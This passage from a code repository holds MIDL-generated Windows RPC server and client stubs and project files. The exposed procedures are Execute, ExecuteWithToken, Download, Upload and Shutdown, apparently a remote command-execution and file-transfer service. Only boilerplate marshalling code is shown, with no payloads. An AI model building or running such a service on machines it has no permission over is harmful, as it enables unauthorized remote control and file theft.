| /* 96 */ 0x43, /* Oi2 Flags: srv must size, clt must size, has ext, */ 180 | 0x2, /* 2 */ 181 | /* 98 */ 0xa, /* 10 */ 182 | 0x1, /* Ext Flags: new corr desc, */ 183 | /* 100 */ NdrFcShort( 0x0 ), /* 0 */ 184 | /* 102 */ NdrFcShort( 0x0 ), /* 0 */ 185 | /* 104 */ NdrFcShort( 0x0 ), /* 0 */ 186 | /* 106 */ NdrFcShort( 0x0 ), /* 0 */ 187 | 188 | /* Parameter Path */ 189 | 190 | /* 108 */ NdrFcShort( 0x200b ), /* Flags: must size, must free, in, srv alloc size=8 */ 191 | /* 110 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 192 | /* 112 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 193 | 194 | /* Parameter Data */ 195 | 196 | /* 114 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ 197 | /* 116 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 198 | /* 118 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 199 | 200 | /* Procedure Upload */ 201 | 202 | /* 120 */ 0x32, /* FC_BIND_PRIMITIVE */ 203 | 0x48, /* Old Flags: */ 204 | /* 122 */ NdrFcLong( 0x0 ), /* 0 */ 205 | /* 126 */ NdrFcShort( 0x3 ), /* 3 */ 206 | /* 128 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ 207 | /* 130 */ NdrFcShort( 0x0 ), /* 0 */ 208 | /* 132 */ NdrFcShort( 0x0 ), /* 0 */ 209 | /* 134 */ 0x42, /* Oi2 Flags: clt must size, has ext, */ 210 | 0x2, /* 2 */ 211 | /* 136 */ 0xa, /* 10 */ 212 | 0x1, /* Ext Flags: new corr desc, */ 213 | /* 138 */ NdrFcShort( 0x0 ), /* 0 */ 214 | /* 140 */ NdrFcShort( 0x0 ), /* 0 */ 215 | /* 142 */ NdrFcShort( 0x0 ), /* 0 */ 216 | /* 144 */ NdrFcShort( 0x0 ), /* 0 */ 217 | 218 | /* Parameter Path */ 219 | 220 | /* 146 */ NdrFcShort( 0x200b ), /* Flags: must size, must free, in, srv alloc size=8 */ 221 | /* 148 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 222 | /* 150 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 223 | 224 | /* Parameter Data */ 225 | 226 | /* 152 */ NdrFcShort( 0x200b ), /* Flags: must size, must free, in, srv alloc size=8 */ 227 | /* 154 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ 228 | /* 156 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ 229 | 230 | /* Procedure Shutdown */ 231 | 232 | /* 158 */ 0x32, /* FC_BIND_PRIMITIVE */ 233 | 0x48, /* Old Flags: */ 234 | /* 160 */ NdrFcLong( 0x0 ), /* 0 */ 235 | /* 164 */ NdrFcShort( 0x4 ), /* 4 */ 236 | /* 166 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ 237 | /* 168 */ NdrFcShort( 0x0 ), /* 0 */ 238 | /* 170 */ NdrFcShort( 0x0 ), /* 0 */ 239 | /* 172 */ 0x40, /* Oi2 Flags: has ext, */ 240 | 0x0, /* 0 */ 241 | /* 174 */ 0xa, /* 10 */ 242 | 0x1, /* Ext Flags: new corr desc, */ 243 | /* 176 */ NdrFcShort( 0x0 ), /* 0 */ 244 | /* 178 */ NdrFcShort( 0x0 ), /* 0 */ 245 | /* 180 */ NdrFcShort( 0x0 ), /* 0 */ 246 | /* 182 */ NdrFcShort( 0x0 ), /* 0 */ 247 | 248 | 0x0 249 | } 250 | }; 251 | 252 | static const RpcServerInterface_MIDL_TYPE_FORMAT_STRING RpcServerInterface__MIDL_TypeFormatString = 253 | { 254 | 0, 255 | { 256 | NdrFcShort( 0x0 ), /* 0 */ 257 | /* 2 */ 258 | 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ 259 | /* 4 */ NdrFcShort( 0x2 ), /* Offset= 2 (6) */ 260 | /* 6 */ 261 | 0x12, 0x8, /* FC_UP [simple_pointer] */ 262 | /* 8 */ 263 | 0x22, /* FC_C_CSTRING */ 264 | 0x5c, /* FC_PAD */ 265 | 266 | 0x0 267 | } 268 | }; 269 | 270 | static const unsigned short RpcServerInterface_FormatStringOffsetTable[] = 271 | { 272 | 0, 273 | 38, 274 | 82, 275 | 120, 276 | 158 277 | }; 278 | 279 | 280 | static const RPC_DISPATCH_FUNCTION RpcServerInterface_table[] = 281 | { 282 | NdrServerCall2, 283 | NdrServerCall2, 284 | NdrServerCall2, 285 | NdrServerCall2, 286 | NdrServerCall2, 287 | 0 288 | }; 289 | static const RPC_DISPATCH_TABLE RpcServerInterface_v1_0_DispatchTable = 290 | { 291 | 5, 292 | (RPC_DISPATCH_FUNCTION*)RpcServerInterface_table 293 | }; 294 | 295 | 296 | #endif /* defined(_M_AMD64)*/ 297 | 298 | 299 | 300 | /* this ALWAYS GENERATED file contains the RPC server stubs */ 301 | 302 | 303 | /* File created by MIDL compiler version 8.01.0622 */ 304 | /* at Mon Jan 18 21:14:07 2038 305 | */ 306 | /* Compiler settings for RpcServerInterface.idl: 307 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 308 | protocol : all , ms_ext, c_ext, robust 309 | error checks: allocation ref bounds_check enum stub_data 310 | VC __declspec() decoration level: 311 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 312 | DECLSPEC_UUID(), MIDL_INTERFACE() 313 | */ 314 | /* @@MIDL_FILE_HEADING( ) */ 315 | 316 | #if defined(_M_AMD64) 317 | 318 | 319 | 320 | 321 | #if !defined(__RPC_WIN64__) 322 | #error Invalid build platform for this stub. 323 | #endif 324 | 325 | 326 | #include "ndr64types.h" 327 | #include "pshpack8.h" 328 | 329 | 330 | typedef 331 | struct 332 | { 333 | struct _NDR64_PROC_FORMAT frag1; 334 | } 335 | __midl_frag31_t; 336 | extern const __midl_frag31_t __midl_frag31; 337 | 338 | typedef 339 | struct _NDR64_CONFORMANT_STRING_FORMAT 340 | __midl_frag30_t; 341 | extern const __midl_frag30_t __midl_frag30; 342 | 343 | typedef 344 | struct _NDR64_POINTER_FORMAT 345 | __midl_frag29_t; 346 | extern const __midl_frag29_t __midl_frag29; 347 | 348 | typedef 349 | struct _NDR64_POINTER_FORMAT 350 | __midl_frag28_t; 351 | extern const __midl_frag28_t __midl_frag28; 352 | 353 | typedef 354 | struct 355 | { 356 | struct _NDR64_PROC_FORMAT frag1; 357 | struct _NDR64_PARAM_FORMAT frag2; 358 | struct _NDR64_PARAM_FORMAT frag3; 359 | } 360 | __midl_frag24_t; 361 | extern const __midl_frag24_t __midl_frag24; 362 | 363 | typedef 364 | struct 365 | { 366 | struct _NDR64_PROC_FORMAT frag1; 367 | struct _NDR64_PARAM_FORMAT frag2; 368 | struct _NDR64_PARAM_FORMAT frag3; 369 | } 370 | __midl_frag17_t; 371 | extern const __midl_frag17_t __midl_frag17; 372 | 373 | typedef 374 | NDR64_FORMAT_CHAR 375 | __midl_frag13_t; 376 | extern const __midl_frag13_t __midl_frag13; 377 | 378 | typedef 379 | struct 380 | { 381 | struct _NDR64_PROC_FORMAT frag1; 382 | struct _NDR64_PARAM_FORMAT frag2; 383 | struct _NDR64_PARAM_FORMAT frag3; 384 | struct _NDR64_PARAM_FORMAT frag4; 385 | } 386 | __midl_frag9_t; 387 | extern const __midl_frag9_t __midl_frag9; 388 | 389 | typedef 390 | NDR64_FORMAT_UINT32 391 | __midl_frag1_t; 392 | extern const __midl_frag1_t __midl_frag1; 393 | 394 | static const __midl_frag31_t __midl_frag31 = 395 | { 396 | /* Shutdown */ 397 | { 398 | /* Shutdown */ /* procedure Shutdown */ 399 | (NDR64_UINT32) 66 /* 0x42 */, /* primitive handle */ /* IsIntrepreted */ 400 | (NDR64_UINT32) 0 /* 0x0 */ , /* Stack size */ 401 | (NDR64_UINT32) 0 /* 0x0 */, 402 | (NDR64_UINT32) 0 /* 0x0 */, 403 | (NDR64_UINT16) 0 /* 0x0 */, 404 | (NDR64_UINT16) 0 /* 0x0 */, 405 | (NDR64_UINT16) 0 /* 0x0 */, 406 | (NDR64_UINT16) 0 /* 0x0 */ 407 | } 408 | }; 409 | 410 | static const __midl_frag30_t __midl_frag30 = 411 | { 412 | /* *CHAR */ 413 | { 414 | /* *CHAR */ 415 | 0x63, /* FC64_CONF_CHAR_STRING */ 416 | { 417 | /* *CHAR */ 418 | 0, 419 | 0, 420 | 0, 421 | 0, 422 | 0, 423 | 0, 424 | 0, 425 | 0 426 | }, 427 | (NDR64_UINT16) 1 /* 0x1 */ 428 | } 429 | }; 430 | 431 | static const __midl_frag29_t __midl_frag29 = 432 | { 433 | /* *CHAR */ 434 | 0x21, /* FC64_UP */ 435 | (NDR64_UINT8) 0 /* 0x0 */, 436 | (NDR64_UINT16) 0 /* 0x0 */, 437 | &__midl_frag30 438 | }; 439 | 440 | static const __midl_frag28_t __midl_frag28 = 441 | { 442 | /* **CHAR */ 443 | 0x20, /* FC64_RP */ 444 | (NDR64_UINT8) 20 /* 0x14 */, 445 | (NDR64_UINT16) 0 /* 0x0 */, 446 | &__midl_frag29 447 | }; 448 | 449 | static const __midl_frag24_t __midl_frag24 = 450 | { 451 | /* Upload */ 452 | { 453 | /* Upload */ /* procedure Upload */ 454 | (NDR64_UINT32) 262210 /* 0x40042 */, /* primitive handle */ /* IsIntrepreted, ClientMustSize */ 455 | (NDR64_UINT32) 16 /* 0x10 */ , /* Stack size */ 456 | (NDR64_UINT32) 0 /* 0x0 */, 457 | (NDR64_UINT32) 0 /* 0x0 */, 458 | (NDR64_UINT16) 0 /* 0x0 */, 459 | (NDR64_UINT16) 0 /* 0x0 */, 460 | (NDR64_UINT16) 2 /* 0x2 */, 461 | (NDR64_UINT16) 0 /* 0x0 */ 462 | }, 463 | { 464 | /* Path */ /* parameter Path */ 465 | &__midl_frag28, 466 | { 467 | /* Path */ 468 | 1, 469 | 1, 470 | 0, 471 | 1, 472 | 0, 473 | 0, 474 | 0, 475 | 0, 476 | 0, 477 | 0, 478 | 0, 479 | 0, 480 | 0, 481 | (NDR64_UINT16) 0 /* 0x0 */, 482 | 1 483 | }, /* MustSize, MustFree, [in], UseCache */ 484 | (NDR64_UINT16) 0 /* 0x0 */, 485 | 0 /* 0x0 */, /* Stack offset */ 486 | }, 487 | { 488 | /* Data */ /* parameter Data */ 489 | &__midl_frag28, 490 | { 491 | /* Data */ 492 | 1, 493 | 1, 494 | 0, 495 | 1, 496 | 0, 497 | 0, 498 | 0, 499 | 0, 500 | 0, 501 | 0, 502 | 0, 503 | 0, 504 | 0, 505 | (NDR64_UINT16) 0 /* 0x0 */, 506 | 1 507 | }, /* MustSize, MustFree, [in], UseCache */ 508 | (NDR64_UINT16) 0 /* 0x0 */, 509 | 8 /* 0x8 */, /* Stack offset */ 510 | } 511 | }; 512 | 513 | static const __midl_frag17_t __midl_frag17 = 514 | { 515 | /* Download */ 516 | { 517 | /* Download */ /* procedure Download */ 518 | (NDR64_UINT32) 393282 /* 0x60042 */, /* primitive handle */ /* IsIntrepreted, ServerMustSize, ClientMustSize */ 519 | (NDR64_UINT32) 16 /* 0x10 */ , /* Stack size */ 520 | (NDR64_UINT32) 0 /* 0x0 */, 521 | (NDR64_UINT32) 0 /* 0x0 */, 522 | (NDR64_UINT16) 0 /* 0x0 */, 523 | (NDR64_UINT16) 0 /* 0x0 */, 524 | (NDR64_UINT16) 2 /* 0x2 */, 525 | (NDR64_UINT16) 0 /* 0x0 */ 526 | }, 527 | { 528 | /* Path */ /* parameter Path */ 529 | &__midl_frag28, 530 | { 531 | /* Path */ 532 | 1, 533 | 1, 534 | 0, 535 | 1, 536 | 0, 537 | 0, 538 | 0, 539 | 0, 540 | 0, 541 | 0, 542 | 0, 543 | 0, 544 | 0, 545 | (NDR64_UINT16) 0 /* 0x0 */, 546 | 1 547 | }, /* MustSize, MustFree, [in], UseCache */ 548 | (NDR64_UINT16) 0 /* 0x0 */, 549 | 0 /* 0x0 */, /* Stack offset */ 550 | }, 551 | { 552 | /* Data */ /* parameter Data */ 553 | &__midl_frag28, 554 | { 555 | /* Data */ 556 | 1, 557 | 1, 558 | 0, 559 | 0, 560 | 1, 561 | 0, 562 | 0, 563 | 0, 564 | 0, 565 | 0, 566 | 0, 567 | 0, 568 | 0, 569 | (NDR64_UINT16) 0 /* 0x0 */, 570 | 1 571 | }, /* MustSize, MustFree, [out], UseCache */ 572 | (NDR64_UINT16) 0 /* 0x0 */, 573 | 8 /* 0x8 */, /* Stack offset */ 574 | } 575 | }; 576 | 577 | static const __midl_frag13_t __midl_frag13 = 578 | 0x5 /* FC64_INT32 */; 579 | 580 | static const __midl_frag9_t __midl_frag9 = 581 | { 582 | /* ExecuteWithToken */ 583 | { 584 | /* ExecuteWithToken */ /* procedure ExecuteWithToken */ 585 | (NDR64_UINT32) 393282 /* 0x60042 */, /* primitive handle */ /* IsIntrepreted, ServerMustSize, ClientMustSize */ 586 | (NDR64_UINT32) 24 /* 0x18 */ , /* Stack size */ 587 | (NDR64_UINT32) 8 /* 0x8 */, 588 | (NDR64_UINT32) 0 /* 0x0 */, 589 | (NDR64_UINT16) 0 /* 0x0 */, 590 | (NDR64_UINT16) 0 /* 0x0 */, 591 | (NDR64_UINT16) 3 /* 0x3 */, 592 | (NDR64_UINT16) 0 /* 0x0 */ 593 | }, 594 | { 595 | /* Command */ /* parameter Command */ 596 | &__midl_frag28, 597 | { 598 | /* Command */ 599 | 1, 600 | 1, 601 | 0, 602 | 1, 603 | 0, 604 | 0, 605 | 0, 606 | 0, 607 | 0, 608 | 0, 609 | 0, 610 | 0, 611 | 0, 612 | (NDR64_UINT16) 0 /* 0x0 */, 613 | 1 614 | }, /* MustSize, MustFree, [in], UseCache */ 615 | (NDR64_UINT16) 0 /* 0x0 */, 616 | 0 /* 0x0 */, /* Stack offset */ 617 | }, 618 | { 619 | /* ProcessId */ /* parameter ProcessId */ 620 | &__midl_frag13, 621 | { 622 | /* ProcessId */ 623 | 0, 624 | 0, 625 | 0, 626 | 1, 627 | 0, 628 | 0, 629 | 1, 630 | 1, 631 | 0, 632 | 0, 633 | 0, 634 | 0, 635 | 0, 636 | (NDR64_UINT16) 0 /* 0x0 */, 637 | 0 638 | }, /* [in], Basetype, ByValue */ 639 | (NDR64_UINT16) 0 /* 0x0 */, 640 | 8 /* 0x8 */, /* Stack offset */ 641 | }, 642 | { 643 | /* Output */ /* parameter Output */ 644 | &__midl_frag28, 645 | { 646 | /* Output */ 647 | 1, 648 | 1, 649 | 0, 650 | 0, 651 | 1, 652 | 0, 653 | 0, 654 | 0, 655 | 0, 656 | 0, 657 | 0, 658 | 0, 659 | 0, 660 | (NDR64_UINT16) 0 /* 0x0 */, 661 | 1 662 | }, /* MustSize, MustFree, [out], UseCache */ 663 | (NDR64_UINT16) 0 /* 0x0 */, 664 | 16 /* 0x10 */, /* Stack offset */ 665 | } 666 | }; 667 | 668 | static const __midl_frag1_t __midl_frag1 = 669 | (NDR64_UINT32) 0 /* 0x0 */; 670 | 671 | 672 | #include "poppack.h" 673 | 674 | 675 | static const FormatInfoRef RpcServerInterface_Ndr64ProcTable[] = 676 | { 677 | &__midl_frag17, 678 | &__midl_frag9, 679 | &__midl_frag17, 680 | &__midl_frag24, 681 | &__midl_frag31 682 | }; 683 | 684 | 685 | static const MIDL_STUB_DESC RpcServerInterface_StubDesc = 686 | { 687 | (void *)& RpcServerInterface___RpcServerInterface, 688 | MIDL_user_allocate, 689 | MIDL_user_free, 690 | 0, 691 | 0, 692 | 0, 693 | 0, 694 | 0, 695 | RpcServerInterface__MIDL_TypeFormatString.Format, 696 | 1, /* -error bounds_check flag */ 697 | 0x60001, /* Ndr library version */ 698 | 0, 699 | 0x801026e, /* MIDL Version 8.1.622 */ 700 | 0, 701 | 0, 702 | 0, /* notify & notify_flag routine table */ 703 | 0x2000001, /* MIDL flag */ 704 | 0, /* cs routines */ 705 | (void *)& RpcServerInterface_ServerInfo, /* proxy/server info */ 706 | 0 707 | }; 708 | 709 | static const RPC_DISPATCH_FUNCTION RpcServerInterface_NDR64__table[] = 710 | { 711 | NdrServerCallAll, 712 | NdrServerCallAll, 713 | NdrServerCallAll, 714 | NdrServerCallAll, 715 | NdrServerCallAll, 716 | 0 717 | }; 718 | static const RPC_DISPATCH_TABLE RpcServerInterface_NDR64__v1_0_DispatchTable = 719 | { 720 | 5, 721 | (RPC_DISPATCH_FUNCTION*)RpcServerInterface_NDR64__table 722 | }; 723 | 724 | static const MIDL_SYNTAX_INFO RpcServerInterface_SyntaxInfo [ 2 ] = 725 | { 726 | { 727 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 728 | (RPC_DISPATCH_TABLE*)&RpcServerInterface_v1_0_DispatchTable, 729 | RpcServerInterface__MIDL_ProcFormatString.Format, 730 | RpcServerInterface_FormatStringOffsetTable, 731 | RpcServerInterface__MIDL_TypeFormatString.Format, 732 | 0, 733 | 0, 734 | 0 735 | } 736 | ,{ 737 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}, 738 | (RPC_DISPATCH_TABLE*)&RpcServerInterface_NDR64__v1_0_DispatchTable, 739 | 0 , 740 | (unsigned short *) RpcServerInterface_Ndr64ProcTable, 741 | 0, 742 | 0, 743 | 0, 744 | 0 745 | } 746 | }; 747 | 748 | 749 | static const SERVER_ROUTINE RpcServerInterface_ServerRoutineTable[] = 750 | { 751 | (SERVER_ROUTINE)Execute, 752 | (SERVER_ROUTINE)ExecuteWithToken, 753 | (SERVER_ROUTINE)Download, 754 | (SERVER_ROUTINE)Upload, 755 | (SERVER_ROUTINE)Shutdown 756 | }; 757 | 758 | static const MIDL_SERVER_INFO RpcServerInterface_ServerInfo = 759 | { 760 | &RpcServerInterface_StubDesc, 761 | RpcServerInterface_ServerRoutineTable, 762 | RpcServerInterface__MIDL_ProcFormatString.Format, 763 | (unsigned short *) RpcServerInterface_FormatStringOffsetTable, 764 | 0, 765 | (RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax, 766 | 2, 767 | (MIDL_SYNTAX_INFO*)RpcServerInterface_SyntaxInfo 768 | }; 769 | #if _MSC_VER >= 1200 770 | #pragma warning(pop) 771 | #endif 772 | 773 | 774 | #endif /* defined(_M_AMD64)*/ 775 | 776 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2.acf: -------------------------------------------------------------------------------- 1 | // File RpcServerInterface2.acf 2 | [ 3 | // This interface will use an implicit binding handle named hRpcServerInterface2Binding. 4 | implicit_handle(handle_t hRpcServerInterface2Binding) 5 | ] 6 | interface RpcServerInterface2 // The interface is named RpcServerInterface2 7 | { 8 | } 9 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Mon Jan 18 21:14:07 2038 8 | */ 9 | /* Compiler settings for RpcServerInterface2.idl: 10 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | 20 | 21 | /* verify that the version is high enough to compile this file*/ 22 | #ifndef __REQUIRED_RPCNDR_H_VERSION__ 23 | #define __REQUIRED_RPCNDR_H_VERSION__ 500 24 | #endif 25 | 26 | #include "rpc.h" 27 | #include "rpcndr.h" 28 | 29 | #ifndef __RPCNDR_H_VERSION__ 30 | #error this stub requires an updated version of 31 | #endif /* __RPCNDR_H_VERSION__ */ 32 | 33 | 34 | #ifndef __RpcServerInterface2_h__ 35 | #define __RpcServerInterface2_h__ 36 | 37 | #if defined(_MSC_VER) && (_MSC_VER >= 1020) 38 | #pragma once 39 | #endif 40 | 41 | /* Forward Declarations */ 42 | 43 | #ifdef __cplusplus 44 | extern "C"{ 45 | #endif 46 | 47 | 48 | #ifndef __RpcServerInterface2_INTERFACE_DEFINED__ 49 | #define __RpcServerInterface2_INTERFACE_DEFINED__ 50 | 51 | /* interface RpcServerInterface2 */ 52 | /* [implicit_handle][version][uuid] */ 53 | 54 | void Shutdown2( void); 55 | 56 | 57 | extern handle_t hRpcServerInterface2Binding; 58 | 59 | 60 | extern RPC_IF_HANDLE RpcServerInterface2_v1_0_c_ifspec; 61 | extern RPC_IF_HANDLE RpcServerInterface2_v1_0_s_ifspec; 62 | #endif /* __RpcServerInterface2_INTERFACE_DEFINED__ */ 63 | 64 | /* Additional Prototypes for ALL interfaces */ 65 | 66 | /* end of Additional Prototypes */ 67 | 68 | #ifdef __cplusplus 69 | } 70 | #endif 71 | 72 | #endif 73 | 74 | 75 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2.idl: -------------------------------------------------------------------------------- 1 | // File RpcServerInterface2.idl 2 | 3 | [ 4 | // A unique identifier that distinguishes this interface from other interfaces. 5 | uuid(fa161e81-6e93-4f41-961c-ee9c2e75de18), 6 | 7 | // This is version 1.0 of this interface. 8 | version(1.0) 9 | ] 10 | interface RpcServerInterface2 // The interface is named RpcServerInterface2 11 | { 12 | void Shutdown2(void); 13 | } 14 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Debug 10 | x64 11 | 12 | 13 | Release 14 | Win32 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {8558952E-C76B-4976-949F-76A977DA7F8A} 23 | Win32Proj 24 | RpcServerInterface2 25 | 10.0 26 | 27 | 28 | 29 | Utility 30 | MultiByte 31 | v143 32 | 33 | 34 | Utility 35 | MultiByte 36 | v143 37 | 38 | 39 | Utility 40 | MultiByte 41 | v143 42 | 43 | 44 | Utility 45 | MultiByte 46 | v143 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | <_ProjectFileVersion>10.0.40219.1 66 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 67 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 68 | true 69 | true 70 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 71 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 72 | false 73 | false 74 | 75 | 76 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 77 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 78 | 79 | 80 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 81 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 82 | 83 | 84 | 85 | Disabled 86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 87 | true 88 | EnableFastChecks 89 | MultiThreadedDebug 90 | true 91 | true 92 | true 93 | 94 | 95 | Level4 96 | EditAndContinue 97 | 98 | 99 | $(OutDir)RpcServerInterface2.exe 100 | true 101 | $(OutDir)RpcServerInterface2.pdb 102 | Console 103 | MachineX86 104 | 105 | 106 | 4 107 | Ascii 108 | false 109 | %(Filename).h 110 | 111 | 112 | 113 | 114 | Disabled 115 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 116 | EnableFastChecks 117 | MultiThreadedDebug 118 | true 119 | true 120 | true 121 | 122 | 123 | Level4 124 | ProgramDatabase 125 | 126 | 127 | $(OutDir)RpcServerInterface2.exe 128 | true 129 | $(OutDir)RpcServerInterface2.pdb 130 | Console 131 | 132 | 133 | 4 134 | Ascii 135 | false 136 | %(Filename).h 137 | 138 | 139 | 140 | 141 | MaxSpeed 142 | OnlyExplicitInline 143 | true 144 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 145 | true 146 | MultiThreaded 147 | true 148 | true 149 | true 150 | true 151 | 152 | 153 | Level4 154 | ProgramDatabase 155 | 156 | 157 | $(OutDir)RpcServerInterface2.exe 158 | true 159 | Console 160 | true 161 | true 162 | MachineX86 163 | 164 | 165 | 4 166 | Ascii 167 | false 168 | %(Filename).h 169 | 170 | 171 | 172 | 173 | MaxSpeed 174 | OnlyExplicitInline 175 | true 176 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 177 | true 178 | MultiThreaded 179 | true 180 | true 181 | true 182 | true 183 | 184 | 185 | Level4 186 | ProgramDatabase 187 | 188 | 189 | $(OutDir)RpcServerInterface2.exe 190 | true 191 | Console 192 | true 193 | true 194 | 195 | 196 | 4 197 | Ascii 198 | false 199 | %(Filename).h 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /RpcServerInterface2/RpcServerInterface2_c.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the RPC client stubs */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0622 */ 7 | /* at Mon Jan 18 21:14:07 2038 8 | */ 9 | /* Compiler settings for RpcServerInterface2.idl: 10 | Oicf, W4, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | #if defined(_M_AMD64) 20 | 21 | 22 | #if _MSC_VER >= 1200 23 | #pragma warning(push) 24 | #endif 25 | 26 | #pragma warning( disable: 4211 ) /* redefine extern to static */ 27 | #pragma warning( disable: 4232 ) /* dllimport identity*/ 28 | #pragma warning( disable: 4024 ) /* array to pointer mapping*/ 29 | 30 | #include 31 | 32 | #include "RpcServerInterface2.h" 33 | 34 | #define TYPE_FORMAT_STRING_SIZE 3 35 | #define PROC_FORMAT_STRING_SIZE 27 36 | #define EXPR_FORMAT_STRING_SIZE 1 37 | #define TRANSMIT_AS_TABLE_SIZE 0 38 | #define WIRE_MARSHAL_TABLE_SIZE 0 39 | 40 | typedef struct _RpcServerInterface2_MIDL_TYPE_FORMAT_STRING 41 | { 42 | short Pad; 43 | unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; 44 | } RpcServerInterface2_MIDL_TYPE_FORMAT_STRING; 45 | 46 | typedef struct _RpcServerInterface2_MIDL_PROC_FORMAT_STRING 47 | { 48 | short Pad; 49 | unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; 50 | } RpcServerInterface2_MIDL_PROC_FORMAT_STRING; 51 | 52 | typedef struct _RpcServerInterface2_MIDL_EXPR_FORMAT_STRING 53 | { 54 | long Pad; 55 | unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; 56 | } RpcServerInterface2_MIDL_EXPR_FORMAT_STRING; 57 | 58 | 59 | static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = 60 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; 61 | 62 | static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax = 63 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}; 64 | 65 | 66 | 67 | extern const RpcServerInterface2_MIDL_TYPE_FORMAT_STRING RpcServerInterface2__MIDL_TypeFormatString; 68 | extern const RpcServerInterface2_MIDL_PROC_FORMAT_STRING RpcServerInterface2__MIDL_ProcFormatString; 69 | extern const RpcServerInterface2_MIDL_EXPR_FORMAT_STRING RpcServerInterface2__MIDL_ExprFormatString; 70 | 71 | #define GENERIC_BINDING_TABLE_SIZE 0 72 | 73 | 74 | /* Standard interface: RpcServerInterface2, ver. 1.0, 75 | GUID={0xfa161e81,0x6e93,0x4f41,{0x96,0x1c,0xee,0x9c,0x2e,0x75,0xde,0x18}} */ 76 | 77 | extern const MIDL_STUBLESS_PROXY_INFO RpcServerInterface2_ProxyInfo; 78 | handle_t hRpcServerInterface2Binding; 79 | 80 | 81 | static const RPC_CLIENT_INTERFACE RpcServerInterface2___RpcClientInterface = 82 | { 83 | sizeof(RPC_CLIENT_INTERFACE), 84 | {{0xfa161e81,0x6e93,0x4f41,{0x96,0x1c,0xee,0x9c,0x2e,0x75,0xde,0x18}},{1,0}}, 85 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 86 | 0, 87 | 0, 88 | 0, 89 | 0, 90 | &RpcServerInterface2_ProxyInfo, 91 | 0x02000000 92 | }; 93 | RPC_IF_HANDLE RpcServerInterface2_v1_0_c_ifspec = (RPC_IF_HANDLE)& RpcServerInterface2___RpcClientInterface; 94 | 95 | extern const MIDL_STUB_DESC RpcServerInterface2_StubDesc; 96 | 97 | static RPC_BINDING_HANDLE RpcServerInterface2__MIDL_AutoBindHandle; 98 | 99 | 100 | void Shutdown2( void) 101 | 